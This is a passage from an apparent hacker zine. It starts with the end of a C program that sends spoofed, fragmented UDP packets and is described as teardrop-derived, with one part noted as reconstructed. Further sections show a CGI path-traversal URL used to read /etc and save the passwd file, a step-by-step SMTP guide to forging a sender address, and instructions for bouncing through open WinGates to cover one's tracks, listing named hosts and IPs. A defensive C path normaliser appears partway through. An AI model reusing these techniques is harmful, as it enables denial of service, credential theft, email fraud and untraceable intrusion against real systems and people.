    *((u_short *)p_ptr) = 0 | FIX(IP_MF);  /* IP frag flags and offset */
    p_ptr += 2;
    *((u_short *)p_ptr) = 0x40;         /* IP TTL */
    byte = IPPROTO_UDP;
    memcpy(p_ptr + 1, &byte, sizeof(u_char));
    p_ptr += 4;                         /* IP checksum filled in by kernel */
    *((u_long *)p_ptr) = src_ip;        /* IP source address */
    p_ptr += 4;
    *((u_long *)p_ptr) = dst_ip;        /* IP destination address */
    p_ptr += 44;                        /* skip to the end of the 60-byte header */
    *((u_short *)p_ptr) = htons(src_prt);       /* UDP source port */
    p_ptr += 2;
    *((u_short *)p_ptr) = htons(dst_prt);       /* UDP destination port */
    p_ptr += 2;
    *((u_short *)p_ptr) = htons(8 + PADDING);   /* UDP total length */

    /* The span from here to the bcopy() in name_resolve() is missing from
     * the page's copy (lost between a '<' and a '>'); restored to follow
     * the pattern of the two sends above and the teardrop code this is
     * derived from. */
    for (i = 0; i < PADDING; i++)
    {
        p_ptr[i] = random() % 255;      /* random filler */
    }

    if (sendto(sock, packet, IPH + UDPH + PADDING+40, 0, (struct sockaddr *)&sin,
               sizeof(struct sockaddr)) == -1)
    {
        perror("\nsendto");
        free(packet);
        exit(1);
    }

    free(packet);
}

u_long name_resolve(u_char *host_name)
{
    struct in_addr addr;
    struct hostent *host_ent;

    if ((addr.s_addr = inet_addr(host_name)) == -1)
    {
        if (!(host_ent = gethostbyname(host_name))) return (0);
        bcopy(host_ent->h_addr, (char *)&addr.s_addr, host_ent->h_length);
    }
    return (addr.s_addr);
}

void usage(u_char *name)
{
    fprintf(stderr,
            "%s src_ip dst_ip [ -s src_prt ] [ -t dst_prt ] [ -n how_many ]\n",
            name);
    exit(0);
}

(11)------------SECURITY--------------------------------------(11)
[Infoseek]-------------------------------------| optiklenz |

    http://www.infoseek.com/cgi/bin?/./view?/home/path

Replace bin with etc (or any other directory) and you receive the /etc/
directory structure, which contains the passwd file. The URL above exploits
a subtle flaw in Infoseek's CGI: it returns the contents of whatever path
you hand it after the "?", so it can be used to view binaries and commands
as well as directories. If you are viewing it with a Netscape browser keep
reloading the document; the binary output changes each time. If you are
using lynx you should receive the command binary and a directory
structure.
    /bin/, for example. lynx prints the raw binary; the readable parts are
    the command names embedded in it, which is what the dump boils down to:

    uname sleep strchg strconf stty su tabs tail talk tee telnet tftp tic
    time tip tplot tput tr true tty uptime vacation vmstat wc which who
    whois write xargs xstr bg cd command dispgid dispuid ex fc fg getopts
    hash i386 i486 i860 i86pc iAPX286 jobs kill ln m68k mc68000 mc68010
    mc68020 mc68030 mc68040 mv page pdp11 read red rksh sh sparc sun sun2
    sun3 sun3x sun4 sun4c sun4d sun4e sun4m test touch type u370 u3b u3b15
    u3b2 u3b5 ulimit umask unalias vax vedit vi view w wait yppasswd dmesg
    pcat strace asa awk banner batch bc bdiff bfs cal calendar col comm
    compress csplit dc diff diff3 dircmp dos2unix expand factor graph last
    lastcomm logname look mkfifo nawk newform news nl pack paste rup rusers
    sdiff sort spell spline split sum tcopy unexpand uniq units unix2dos
    unpack uudecode uuencode vsig oawk uncompress zcat volcheck audioconvert
    admintool showrev chrtbl colltbl gencat gettxt kbdcomp locale mkmsgs
    montbl msgfmt printf srchtxt xgettext wchrtbl addbib apropos checkeq
    checknr daps deroff diffmk eqn indxbib lookbib neqn nroff refer roffbib
    soelim sortbib ta tbl troff ul vgrind catman man whatis sag sar acctcom
    timex ct cu uucp uuglist ...

    (names like sparc, sun4c, admintool and showrev mark the box as a
    Solaris machine)

    http://www.infoseek.com/cgi/etc?/./read_./log/view?/home/passwd

in lynx lists the directory structure of the etc directory, i.e. /etc/,
with the binary noise stripped:

    resolv.conf passwd notrouter login.access shells hosts.equiv
    defaultrouter skeykeys hostname.hme1 shadow opasswd rdist publickey
    chroot mvdir pwck termcap unlink rmmount.conf vold.conf
    .sysIDtool.state defaultdomain nodename hostname.hme0 .obp_devices
    initpipe.old path_to_inst.old mnttab.loc ...

If you use lynx you will be able to save the passwd file.
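What the Infoseek CGI gets wrong is that it opens the path the client names. As an added example (not from the zine and not Infoseek's code), the C below puts that pattern next to a hardened version: a lexical normaliser that treats every request as relative to a document root and fails closed on any ".." that would climb out of it. The document root "/home/docs" and the request strings are made up for the demonstration.

```c
/* pathguard.c - added example: the vulnerable "glue the client's path onto
 * the root" pattern beside a normaliser that refuses to leave the root.
 * Root and request strings below are constructed for the demo. */
#include <stdio.h>
#include <string.h>

#define MAX_SEGS 64

/* The vulnerable pattern: "../" and leading "/" pass straight through,
 * which is how "bin" turns into "etc" in the URL above. */
void unsafe_resolve(const char *root, const char *req, char *out, size_t outsz)
{
    snprintf(out, outsz, "%s/%s", root, req);
}

/* Hardened: req is relative to root however many leading '/' it carries,
 * "." segments are dropped, and a ".." with nothing left to pop is an
 * escape attempt.  Returns 0 on success, -1 on traversal, -2 if the result
 * would not fit.  Run it on the URL-decoded path ("%2e%2e" must already be
 * ".."), and because it is purely lexical, if root can hold symlinks follow
 * it with realpath() on the result and re-check that root is its prefix. */
int safe_resolve(const char *root, const char *req, char *out, size_t outsz)
{
    const char *seg[MAX_SEGS];
    size_t len[MAX_SEGS];
    int depth = 0, i;
    size_t used;
    const char *p = req;

    while (*p) {
        const char *start;
        size_t n;
        while (*p == '/') p++;                    /* skip separators */
        if (!*p) break;
        start = p;
        while (*p && *p != '/') p++;
        n = (size_t)(p - start);
        if (n == 1 && start[0] == '.') continue;  /* "." is a no-op */
        if (n == 2 && start[0] == '.' && start[1] == '.') {
            if (depth == 0) return -1;            /* would climb out of root */
            depth--;
            continue;
        }
        if (depth == MAX_SEGS) return -2;
        seg[depth] = start;
        len[depth] = n;
        depth++;
    }

    used = strlen(root);
    if (used >= outsz) return -2;
    memcpy(out, root, used);
    for (i = 0; i < depth; i++) {
        if (used + 1 + len[i] >= outsz) return -2;
        out[used++] = '/';
        memcpy(out + used, seg[i], len[i]);
        used += len[i];
    }
    out[used] = '\0';
    return 0;
}

/* Helpers so the behaviour can be checked without touching a filesystem. */
int resolves_to(const char *root, const char *req, const char *expect)
{
    char buf[256];
    return safe_resolve(root, req, buf, sizeof buf) == 0 && strcmp(buf, expect) == 0;
}

int is_rejected(const char *root, const char *req)
{
    char buf[256];
    return safe_resolve(root, req, buf, sizeof buf) == -1;
}

int main(void)
{
    const char *root = "/home/docs";
    const char *reqs[] = { "/./view/index.html", "/../../etc/passwd",
                           "view/../../etc/passwd", "a//b/./../c" };
    char buf[256];
    int i;

    for (i = 0; i < 4; i++) {
        unsafe_resolve(root, reqs[i], buf, sizeof buf);
        printf("unsafe: %-24s -> %s\n", reqs[i], buf);
        if (safe_resolve(root, reqs[i], buf, sizeof buf) == 0)
            printf("safe:   %-24s -> %s\n", reqs[i], buf);
        else
            printf("safe:   %-24s -> rejected\n", reqs[i]);
    }
    return 0;
}
```

The lexical check is the cheap first gate; it does nothing about a symlink inside the root that points at /etc, which is why the comment pairs it with realpath() on the normalised result.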
(12)------------SECURITY--------------------------------------(12)
[Mail Forge]-------------------------------------| optiklenz |

I wrote about this years ago and decided to revise it. This abuses SMTP
(port 25) to forge email from a remote host: the server takes whatever
sender address you give it on trust.

Unix/Linux users use:

    $ telnet url.host.net 25

Windows users use c:\windows\telnet, entering url.host.net as the host to
connect to and 25 as the port.

After connecting you get the banner, for example:

    220 url.host.net ESMTP Sendmail 8.8.5/SCO5 ready at <weekday>, <day month year> <time> -0400 (EDT)

If it prompts with "It's always polite to helo first", send the helo before
anything else. The commands, in this order:

    helo <your host>                [ helo = announce the sending host ]
    mail from: fake@faked.net       [ mail from = the forged sender ]
    rcpt to: user@domain.net        [ rcpt = recipient ]
    data

vrfy comes into play if things don't seem to be going right. For verify it
is good to know the uids (login names) of people who use the system you
are forging from; use:

    vrfy uid

After "data" the first line you type is the title, as a "Subject:" header,
then a blank line, then the body of the message. Once finished type a line
containing only a "." and press enter, then type quit and press enter.
Bear in mind the receiving server still stamps the message with a
Received: header naming the host you connected from, so the forgery is
only as anonymous as your connection.

(13)------------SECURITY--------------------------------------(13)
[Wingate]-------------------------------------| optiklenz |

A short preface on what WinGates are for. An open WinGate on certain
systems lets you bounce from one host to another. A WinGate can work for
a system or against it: one use is as a firewall, protecting your host
from outside attacks; another is bouncing from one host to another to
cover your tracks, which puts the blame on the system you bounced
through.

Unix/Linux usage:

    $ telnet wingate.net

Windows usage: run a telnet client and connect to the WinGate address on
port 23.

Once prompted with "Wingate> " enter the host you want to bounce to; an
open WinGate asks for no password at this point. If you are using the
WinGate method to test your own system's logging, it is good to bounce
through more than one WinGate at a time.
Using a WinGate as a SOCKS host on IRC:

Linux use:

    /server <wingate host>:23
    /quote <irc server>:6667

Windows use: enter the WinGate location in your IRC client's
"FIREWALL/SOCKS HOST" setting.

[Some Wingates For your Proxy Pleasure]

    ns2.thesocket.com
    formfill.com
    207.96.173.116
    207.96.173.109
    207.96.173.119
    207.96.173.144

(14)------------SECURITY--------------------------------------(14)